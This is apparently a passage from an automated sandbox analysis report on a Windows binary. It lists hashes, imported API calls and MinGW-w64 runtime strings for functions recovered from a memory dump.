                            • Opcode ID: 1120053f0c8ee25a2c5971867fed38ff3f13a51433c79c255e2a31e5cb112621
                            • Instruction ID: 0f722181dda7489ff8a8d8ef8876dcff147c623f96e14c2cfc2264aa811f9652
                            • Opcode Fuzzy Hash: 1120053f0c8ee25a2c5971867fed38ff3f13a51433c79c255e2a31e5cb112621
                            • Instruction Fuzzy Hash: 3131AF32E0AB8685EA51BF1AB8092F8A394AF45794FDC1131CD4D8B369DF3CB495D320
                            APIs
                            • TlsAlloc.KERNEL32 ref: 00007FF75F8CD124
                            • abort.MSVCRT ref: 00007FF75F998F50
                            • abort.MSVCRT(?,?,00007FF75F9D0190,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998F56
                            • abort.MSVCRT(?,?,00007FF75F9D0190,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998F5C
                            • GetModuleHandleA.KERNEL32 ref: 00007FF75F998FAD
                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998FCC
                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998FDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: abort$AddressProc$AllocHandleModule
                            • String ID: AddVectoredExceptionHandler$RemoveVectoredExceptionHandler$kernel32.dll
                            • API String ID: 129120984-3889795909
                            • Opcode ID: 7d72271dd47eaa126999cd38e69fafefc643d3913e058229b02e07d1f52875f6
                            • Instruction ID: c1e2fd59f7a8d2ba22962485714b514ae5867423c66508f3096c05200df946e1
                            • Opcode Fuzzy Hash: 7d72271dd47eaa126999cd38e69fafefc643d3913e058229b02e07d1f52875f6
                            • Instruction Fuzzy Hash: 25115E61E1AF8681EA40BB29FC492E4A3E4BF49754FD81532D98C87379DF3CE0958310
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: ExceptionRaiseUnwindabort
                            • String ID: CCG $CCG!$CCG!$CCG"
                            • API String ID: 4140830120-3707373406
                            • Opcode ID: bc4f4f503dc56429e8e8aec229598feaf93dbdd8e1389cc6958ec640c7e7554b
                            • Instruction ID: 009d1a46d0088845c509daaa436fbb1f9d304b51db436602ba94444b4f2a79ae
                            • Opcode Fuzzy Hash: bc4f4f503dc56429e8e8aec229598feaf93dbdd8e1389cc6958ec640c7e7554b
                            • Instruction Fuzzy Hash: 2151C033A08B8082E7609B55E4946EDB360F789B84F988236EE8D17758DF3CE891C704
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: Thread$Event$Context$AllocHandleInformationObjectResumeSingleSuspendValueWait
                            • String ID:
                            • API String ID: 1746956495-0
                            • Opcode ID: f789b482d1c0f3fa81d7b2275365b135f1cf28eaaa5179bc3e2678044981c34d
                            • Instruction ID: fa2853715889f94cb49a83fbbb2827f4dd3f4e766864c19957452a0357a57c9d
                            • Opcode Fuzzy Hash: f789b482d1c0f3fa81d7b2275365b135f1cf28eaaa5179bc3e2678044981c34d
                            • Instruction Fuzzy Hash: 5381C422A59BC285FB64BF2594052F8A760EF41BA4F9C0631DE5E4F2D5DF2CF491A320
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: strlen
                            • String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
                            • API String ID: 39653677-1250104765
                            • Opcode ID: e29973676b6cf1c87aca60eb4c4d32026e4c7be800cea9dd31b42a99b41e958e
                            • Instruction ID: a5f84be064410447bf798b155b70b593b1e3c57ed1fc49e1bf75209fcc72bfb4
                            • Opcode Fuzzy Hash: e29973676b6cf1c87aca60eb4c4d32026e4c7be800cea9dd31b42a99b41e958e
                            • Instruction Fuzzy Hash: 8CA17062B19B9585EE21BF1AE4401EDA360FB44BD4BCC0436EE4D4B7A5DF2CE561D320
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: abort
                            • String ID:
                            • API String ID: 4206212132-0
                            • Opcode ID: 324b89b5f6c0daf2970604fa24a0e56d0a5e36b88e33d75ee2ea539d8031e9dd
                            • Instruction ID: c25d713c45738ea41a3708eb81ec320e355129ba0af841fdaa8fc35f6479e72d
                            • Opcode Fuzzy Hash: 324b89b5f6c0daf2970604fa24a0e56d0a5e36b88e33d75ee2ea539d8031e9dd
                            • Instruction Fuzzy Hash: C0519122A1AB8694EA55BF11E4501F8A364AF44B80FDC8435DA0E8F395DF3CF561E720
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: CriticalSection$Delete$CloseHandle$EnterLeavefree
                            • String ID:
                            • API String ID: 549544486-0
                            • Opcode ID: 74bb9b4665fa0efd3c2310787a5fe467dd126bfdaf21c6c3fd9884b241be65bb
                            • Instruction ID: dcf26e3b24785e4edf573a678d0ca0f980749ab0c8c98033637302621bf071ef
                            • Opcode Fuzzy Hash: 74bb9b4665fa0efd3c2310787a5fe467dd126bfdaf21c6c3fd9884b241be65bb
                            • Instruction Fuzzy Hash: 4441B323B05A8645F651AF25AC007E96355AB81BB8FCC0232DD6D8F3D5DE3CE496E320
                            APIs
                            • calloc.MSVCRT ref: 00007FF75F8CB4BB
                            • CreateSemaphoreA.KERNEL32 ref: 00007FF75F8CB4EE
                            • CreateSemaphoreA.KERNEL32 ref: 00007FF75F8CB504
                            • InitializeCriticalSection.KERNEL32(?,00007FF75F9D0190,00007FF75F8D02E8,?,?,00007FF75F99BAA0,00000000,00007FF75F8D0375,00007FF75F99BAA0,?,00007FF75F99BAA0,00007FF75F8D0909,00007FF75F99C480,?,00007FF75F99BAA0), ref: 00007FF75F8CB52C
                            • InitializeCriticalSection.KERNEL32(?,00007FF75F9D0190,00007FF75F8D02E8,?,?,00007FF75F99BAA0,00000000,00007FF75F8D0375,00007FF75F99BAA0,?,00007FF75F99BAA0,00007FF75F8D0909,00007FF75F99C480,?,00007FF75F99BAA0), ref: 00007FF75F8CB532
                            • InitializeCriticalSection.KERNEL32(?,00007FF75F9D0190,00007FF75F8D02E8,?,?,00007FF75F99BAA0,00000000,00007FF75F8D0375,00007FF75F99BAA0,?,00007FF75F99BAA0,00007FF75F8D0909,00007FF75F99C480,?,00007FF75F99BAA0), ref: 00007FF75F8CB538
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: CriticalInitializeSection$CreateSemaphore$calloc
                            • String ID:
                            • API String ID: 2075313795-0
                            • Opcode ID: aa24754e511399bdb0deec9d2dfa1d101c30fd519aa424a8312c3826416e3dfa
                            • Instruction ID: 48819eb580d81b03a433cc5c722b6442731a4d9bfa90e4177f2ef50bcbee979d
                            • Opcode Fuzzy Hash: aa24754e511399bdb0deec9d2dfa1d101c30fd519aa424a8312c3826416e3dfa
                            • Instruction Fuzzy Hash: 2821BF32B0AB8285FB59AF65E9503B96290AF44B94F8C8235CE1D4F3C5EE3CA4909310
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: QueryVirtual
                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                            • API String ID: 1804819252-1534286854
                            • Opcode ID: add52bd74ac2730681b4b08c881067a4124d7d63331f58e463502291fba1dee3
                            • Instruction ID: 64dd29fb81cd1026877e729403f92a72dd987f74e8c7dbbc565048b9d4a1e2d8
                            • Opcode Fuzzy Hash: add52bd74ac2730681b4b08c881067a4124d7d63331f58e463502291fba1dee3
                            • Instruction Fuzzy Hash: 6E51EE32A08A8696EB10AB11E8446E9F760FF84B94FCC4131DE4D5B3A8DF3CE855C760
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: abortfwrite$CaptureContextUnwindfputcfputs
                            • String ID: what(): $terminate called recursively
                            • API String ID: 918577357-2063472960
                            • Opcode ID: 291977919ab7fa4619b7a392b11313dedeca35bfe836718b29f583f332bbcd0e
                            • Instruction ID: fbd87bb705f8bc83944b0f32566eadc72bcca05bc761bd679064e97554f1deb1
                            • Opcode Fuzzy Hash: 291977919ab7fa4619b7a392b11313dedeca35bfe836718b29f583f332bbcd0e
                            • Instruction Fuzzy Hash: 1621C321B29A8641EA54BB66E4293FDD2159F85B80F8C003AEA0E8F3D6DF2DF4105371
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: memcmp$strlen
                            • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                            • API String ID: 3738950036-1697194757
                            • Opcode ID: 6bb02f1659573f7173421bc7d96d3ec77bc8d579c386a245098c9043eb179c90
                            • Instruction ID: 0504b3b8d4de7954e324c646b128aa922e9674182c187e5051578a8b760e427c
                            • Opcode Fuzzy Hash: 6bb02f1659573f7173421bc7d96d3ec77bc8d579c386a245098c9043eb179c90
                            • Instruction Fuzzy Hash: D051E7A2F18ACA41EE14BA66ED002F492545F05BE0FDC4632DE2CDB7D5DE1CF995A320
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: memcmp$strlen
                            • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                            • API String ID: 3738950036-1697194757
                            • Opcode ID: 68ae6bae33f02e1bad149284b6bd7b7dd2a08e47bccab84a5df323f442285b76
                            • Instruction ID: 12eb5964f238291d975ea99f2e410fa8aee3e587f3942d33a85742d1357a1335
                            • Opcode Fuzzy Hash: 68ae6bae33f02e1bad149284b6bd7b7dd2a08e47bccab84a5df323f442285b76
                            • Instruction Fuzzy Hash: 6B51F692F29AC641EE04AA26ED103E4D2549F05BE4FDC4235EE2C9B7E9DE1CF9919310
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID: basic_string::_M_create
                            • API String ID: 2882836952-3122258987
                            • Opcode ID: 53454710a0597d07d8426650471ad8e7b7df0d87e386177c2ea885cc157312a7
                            • Instruction ID: fd8f4cdd130b7ddaed68ba8c38797e76df4e2cbf1c31d0b0b0f6073e4304e02b
                            • Opcode Fuzzy Hash: 53454710a0597d07d8426650471ad8e7b7df0d87e386177c2ea885cc157312a7
                            • Instruction Fuzzy Hash: 4D314532F097C246FB557E2999447BAA2D1DF45B54F9C8035CA0D8E284EF2CF891A270
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: ErrorLastmemsetrealloc$AllocValue
                            • String ID:
                            • API String ID: 2127548929-0
                            • Opcode ID: 3ff0690f7f5a9f15f60a8ada848e35d2ef969419ccee2db4f91c80eef75124c6
                            • Instruction ID: d9c2d17526aeb3c464190463de67dc9ed8d4ad068ea3cb24ee6549aa15bf5b46
                            • Opcode Fuzzy Hash: 3ff0690f7f5a9f15f60a8ada848e35d2ef969419ccee2db4f91c80eef75124c6
                            • Instruction Fuzzy Hash: 27219162B15B8291EB15FF29A8045EDA392EF45B94F880435DD0D4F395EE3CF891D360
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: _errno$_wfindfirst64wcscpywcslen
                            • String ID:
                            • API String ID: 2144498627-0
                            • Opcode ID: 5666a025c08d4113b6347b14c0f83c1c8b661bd71551048367378fc50bf3fed1
                            • Instruction ID: 7678739f090ba28240290c73b6a8db1d47afa8ad8a6f4271a9c145ce4326f3c9
                            • Opcode Fuzzy Hash: 5666a025c08d4113b6347b14c0f83c1c8b661bd71551048367378fc50bf3fed1
                            • Instruction Fuzzy Hash: 77212FA1A1878285E754BF2584543EDA290AB40BA8FDC4630CB2D8F2C5DF39B461AB75
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: exitfprintf
                            • String ID: ($(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$../mingw-w64/mingw-w64-libraries/winpthreads/src/rwlock.c$Assertion failed: (%s), file %s, line %d
                            • API String ID: 4243785698-2396019738
                            • Opcode ID: 6d3363b26023840044199938a3c904b5ad4289ca5541accfe0a28fec2290ac3f
                            • Instruction ID: 99a63f19e82f1a86b0264f0c3966d96446c0f6a0a96f3997f25a1e4b360c883d
                            • Opcode Fuzzy Hash: 6d3363b26023840044199938a3c904b5ad4289ca5541accfe0a28fec2290ac3f
                            • Instruction Fuzzy Hash: 04119362B1868586EB10FF69E4152F8B7A0EB44B44FC88131DA0D8B3A5DF2CE856D760
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: CurrentThreadfprintf
                            • String ID: C%p %lu %s$C%p %lu V=%0X w=%ld %s
                            • API String ID: 1384477639-1941858864
                            • Opcode ID: 963595f198e62fdb3cc8c45ebfb27ba854b0b5b6c59052da72f5d0a94fe817a6
                            • Instruction ID: 596ba539aa345031aba36fba714ab6b664f7a3a74ef91278a9f5dfc0b5095fa4
                            • Opcode Fuzzy Hash: 963595f198e62fdb3cc8c45ebfb27ba854b0b5b6c59052da72f5d0a94fe817a6
                            • Instruction Fuzzy Hash: 5101A176A09F8186EB10AF65F8000E8B7A4BB88B94F9C8032DD4C87328DF3CE495C710
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: Process$CloseCurrentHandleOpen_errno
                            • String ID:
                            • API String ID: 2250453136-0
                            • Opcode ID: cab79bda074d4f9d60d1800ab902ce9462c53bc4857ebd5c76cb2749fcc68820
                            • Instruction ID: bfda030c19611cc0995d32c207c3d911a44eb748680ff42a7001b9af6f0a3472
                            • Opcode Fuzzy Hash: cab79bda074d4f9d60d1800ab902ce9462c53bc4857ebd5c76cb2749fcc68820
                            • Instruction Fuzzy Hash: C0015661B09BC382F7953F5068442F892509F84715FED4535DA1D8E3D2CF2D38D5A230
                            APIs
